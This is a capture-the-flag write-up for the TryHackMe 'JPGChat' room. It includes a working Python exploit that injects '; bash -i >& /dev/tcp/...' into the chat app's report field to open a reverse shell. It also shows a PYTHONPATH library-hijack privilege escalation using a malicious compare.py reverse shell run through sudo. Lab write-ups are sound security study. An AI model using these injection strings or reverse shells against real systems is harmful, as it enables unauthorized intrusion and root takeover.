Room link: https://tryhackme.com/room/jpgchat
Enumeration
Let’s start with all good hacks with a quick Nmap scan to see what I’m working with.
Seems only SSH and a service called PPP open on port 3000.
Let’s try to connect to it from nc (Netcat)
nc -nv IPADDRESS 3000We get this as a response, it seems to be some kind of chat service with a report feature.
Playing with the app we need to supply [MESSAGE] or [REPORT] to get any output. From the REPORT feature, we get the name of the admin!
Let’s do some recon on the application, I head over to Github and do a username search for “mozzie-jpg” we get his Github account. Looking at his repos we can see the JPChat application
Checking the source code for JPchat.py
We can see the message and report functions. Looking at the report_form function we can see a few calls to the os.system, maybe we can use this with command injection to bypass the string and get a reverse shell.
After some playing with the commands, I found this format to work “; id #”
User
As we are using python (hint from the room name), best we make a script to automate the process for us.
Using the code I made to connect I got a reverse shell from a user called wes
# Copy and paste the code into a file and change the IP Address's# TARGET IP = The target machines IP (the one from the tryhackme page)# YOUR IP = Change to your IP and change the port if you need to.import socketIP="10.10.0.0" #TARGET IPPORT=3000s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((IP, PORT))recv = s.recv(1024).decode()message = "[REPORT]\n\r"data = message.encode()s.send(data)recv = s.recv(1024).decode()name = "wes\n\r"s.send(name.encode())r = s.recv(1024).decode()report_text = "; bash -i >& /dev/tcp/10.10.0.0/9999 0>&1 #\n\r" #YOUR IPs.send(report_text.encode())print("Dont close until you have a stable shell\n\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'")s.recv(1024).decode()s.recv(1024).decode()
We can now get the user flag in /home/wes
Root
Now I start to enum again. I check sudo -l first as usual and notice we have something
We can run /usr/bin/python3 /opt/development/test_module.py as root
Running it just returns a True statement.
If we CAT the file test_module.py we get the source code to examine
I notice that there is a * being imported from the compare module. Looking up python Libary abuse I come across a great article about how to abuse python libraries.
Privilege Escalation via Python library hijacking
Checking sudo -l again we can see the SETENV: and env_keep+=PYTHONPATH is set. What’s that??
After a quick google search, it seems we can run any libraries for python that are set in the PYTHONPATH environment variable. So if we make a new file with a reverse shell inside say /tmp called compare.py and set the PYTHONPATH to /tmp we should get a root shell when we run the command sudo -u root /usr/bin/python3 /opt/development/test_module.py, we should get a root shell back! Let’s try it!
Make a file in /tmp called compare.py with the following python3 reverse shell. Swap your IP Address in the code. (replace <<IPADDRESS>> with your own)
exit: Ctrl+↩
import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("<<IPADDRESS>>",7777))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)import pty; pty.spawn("/bin/bash")
export PYTHONPATH=/tmp
Start a Netcat listener on your pc, then run the command from sudo -l
sudo -u root /usr/bin/python3 /opt/development/test_module.pyNow you can go grab the last flag in /root/root.txt
I hope you found this method interesting, I sure did! Shout out to the creators for an epic room
